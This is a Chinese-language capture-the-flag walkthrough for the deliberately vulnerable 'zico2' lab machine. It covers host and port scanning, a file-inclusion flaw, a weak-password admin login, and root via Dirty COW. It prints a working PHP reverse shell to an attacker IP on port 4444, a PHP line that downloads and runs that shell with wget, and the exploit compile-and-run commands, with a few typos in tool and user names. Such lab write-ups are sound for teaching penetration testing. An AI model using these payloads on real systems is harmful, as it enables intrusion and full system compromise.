信息收集
目标靶机:zico2
主机发现
端口扫描
指纹探测
目录扫描
漏洞发现
漏洞利用
提权
总结
信息收集:一:主机发现
netdiscover -i eth0 -r 192.168.10.0/24
对同网段下的主机进行发现(也可使用namp -sV)
扫出目标IP为192.168.10.136
(1为物理机的虚拟网卡,2为网关,254为边界)
二:端口扫描
masscan --rate =100000 --ports 0-65535 192.168.10.136
可使用 namp -sv -T4 -O -p 22,80 192.168.10.136 对端口进行扫描
三:指纹获取
whatweb http://192.168.10.136 可以查看主机的部分信息
四:目录扫描
dirb http://192.168.10.136 可以扫描主机目录文件
漏洞发现:
浏览器访问主机IP:
使用burp suite抓包发现:存在文件包含漏洞**漏洞利用:**访问网页下的bdadmin目录:
使用弱口令攻击发现,登录口令为:admin
在kali的HTML目录下创建shell脚本:
shell.txt:
<?php $sock=fsockopen("192.168.10.128",4444);exec("/bin/sh -i <&3 >&3 2>&3");?>
在此创建数据库,并将shell.php:<?php system("wget 192.168.10.128/shell.txt -O /tmp/shell.php;php /tmp/shell.php");?>
写入(此处代码可将攻击者写好的shell.txt 下载并写入到靶机的shell.php 目录下)
访问创建好的数据库:在KALI开启apache服务,并监听4444端口,发现可以进行登录访问
提权:可以使用python -c 'import pty;pty.spawn("/bin/bash")'
创建终端
下一步可以使用脏牛提权:可以访问TMP目录,进行写操作,将dirty.c文件写入到tmp目录下
使用gcc -pthread dirty.c -o hacker -lcrypt
编译dirty.c文件为hacker程序,
并./hacher 运行此程序
su firefort 进行用户切换,至此,提权完成
访问root目录下的flag文件,拿到flag总结:文件包含漏洞在使用时,需与攻击者建立连接,并将攻击者的代码下载下来,在靶机上运行,可以利用此过程进行shell获取